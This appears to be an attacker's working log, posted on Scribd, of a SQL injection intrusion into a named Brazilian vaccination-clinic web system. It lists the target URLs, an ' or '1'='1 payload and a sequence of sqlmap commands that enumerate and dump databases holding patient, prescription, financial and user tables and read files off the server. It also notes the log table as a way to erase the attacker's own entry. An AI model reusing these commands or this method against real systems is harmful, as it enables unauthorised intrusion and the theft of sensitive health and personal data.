Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Refs

    Enviado por

    Lucas Gabriel Noleto Milagres
    13 visualizações2 páginas

    Título original

    refs

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    TXT, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    13 visualizações2 páginas

    Refs

    Enviado por

    Lucas Gabriel Noleto Milagres

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 2

    ' or '1'='1

    http://www.sistemaimuneweb.com.br/sisvacinas/consulta/login.php
    https://imuneweb.com.br/site/
    -->http://www.sistemaimuneweb.com.br/sisvacinas/
    http://multivacinas.imuneweb4.com.br/areadocliente/

    http://www.sistemaimuneweb.com.br/sisvacinas/relatorios/maladireta_relat.php:
    injecting empresa2 - 132 columns

    1)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140

    report:
    -it looks like there is a WAF/IPS, but I said to the injector dont test this
    further
    -empresa2 might be injectable
    -empresa2 might be vulnerable to xss
    -dbms is MySql
    -vulnerable columns: 2,3,12,71,72,74,76,86

    2)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140 --dbs

    3)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140 --tables -D


    programaimunew02

    4)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140 --dump-all


    --exclude-sysdbs -X aplicacao,aplicacao_antiga_backup --threads=10

    -
    uploadlocal_campanha_cadastrados,empresas,preco_medio,entrada,envioautomatico,carte
    irinha,pedido_temporario,formadecontato,configuracao_modulo_compra,receita,perda,pa
    ciente_embrapa,grupo_vacina,paciente_pj,cep_es,extrato_banco,empresa_estoque,envioa
    utomaticodespesas,solicitacoes,,agenda_campanha,configetiqueta,preco_vacina,numnfse
    ,uploadlocal_naocadastrados,vacina_todososcodigos,quem_recebera,zapcontratado,medic
    os_resp,convenio,sipnidose,lotes_relatorio_extato,ipsautorizados,zapenviados,agenda
    _medica,log,zapmensagem,recebimento_cartao,perda,pedido,,cfop,grupo_empresa,empresa
    _estoque,agenda_grandebh,cidade,localdeaplicacao,estoquereserva,dias_envio_antecede
    ncia,mensagemaplicativo,despesas,enfermeira,sistematizacao,empresa,inventario,sipni
    _estados,listadeespera,receitas_farmaceutico,forma_pagamento,reacoes,bairros_agenda
    ,banco,paciente,proposta_campanha,convenio_por_vacina,estrategias,exame_medico,medi
    co,agendaMeses,vacinasipni,devolucoes,despesas_fixas,smscontratados,cod_vacinas_for
    necedor,desconto_no_estoque_deletado,enfermeiras_resp,pedido_prazo,parametros_impor
    tacao,entrada_antiga,vacina,vacina_backup,protocolo,categoria_receita,motivo_estorn
    o,ponto,laboratorio,medico_visitas,previagem,perdas_ate2017,cod_municipio_ibge,idre
    ceitas,clinica,receita_medico,medico_old,receitas,estoque_historico,codigo_barras_l
    aboratorio,receita_dados,percentual_imposto,tipo_de_pagamento,receitas_medicas,extr
    atodeestoque,usuario,entrada_backup,receitas_backup,uf,cliente,importacao_pacientes
    _novos,andamento_campanha,sistema_imuneweb_ugrights,LOG,importacao_paciente_201119,
    aplicacao_farmaceutico,usuariosimg,categoria_produto,entrada_backup12042019,aplicac
    ao_antiga,envioautomaticofinanceiro,campanha_vacinas_aplicadas,fornecedor,suportete
    cnico,dadosvacina,cartamaladireta,comoconheceuclinica,events,viaadm,status,estoque,
    categoria_despesa,saida,sipni_boletim_de_movimentacao_de_imunobiologicos,mensagemsm
    s,,dadosvacina_backup,agenda2,resultado_de_exame,relat_mov_bancario,smsenviados,dad
    osnfce,especialidade,preco_item_fornecedor,filadeespera,agenda,uploadlocal,desconto
    _no_estoque,enviosipni,

    saltei a tabela "aplicacao" pois possui 280000 registros


    "aplicacao_antiga_backup" demorando muito no fetching
    "log" possui 513188 entradas (canal p/ apagar minha entada)
    "paciente" detected invalid data for declared content encoding 'gzip'
    "ponto" detected invalid data for declared content encoding 'gzip'
    "importacao_paciente_201119" detected invalid data for declared content encoding
    'gzip'
    "receitas" possui 132206 entradas

    5)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140 --dump tables -D


    information.schema --threads=8

    -error. cannot retrieve entries

    6)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140 --sql-query="SELECT


    * FROM log LIMIT 513000,200" -D programaimunew02 --threads=10

    7)sqlmap.py -r maladireta.txt -p empresa2 --union-cols 130-140 --dump -T paciente


    -D programaimunew02 --threads=10

    8)http://www.sistemaimuneweb.com.br/sisvacinas/ 03:07am

    9) http://www.sis.imuneweb1.com.br/menu.php 03:22

    10) /home/imuneweb1/www/sis/financeiro/nf/upload-arquivo.php

    11) sqlmap.py -r vacinasaaplicar.txt -p empresa2 --file-read


    "/home/imuneweb1/www/sis/financeiro/nf/Arquivo/93618f15c73df65b21763ba4af11f2ce.xml
    " -v 1

    12) sqlmap.py -r vacinasaaplicar.txt -p empresa2 --union-cols 130-140 --count -T


    paciente -D programaimunew02 --threads=10

    Você também pode gostar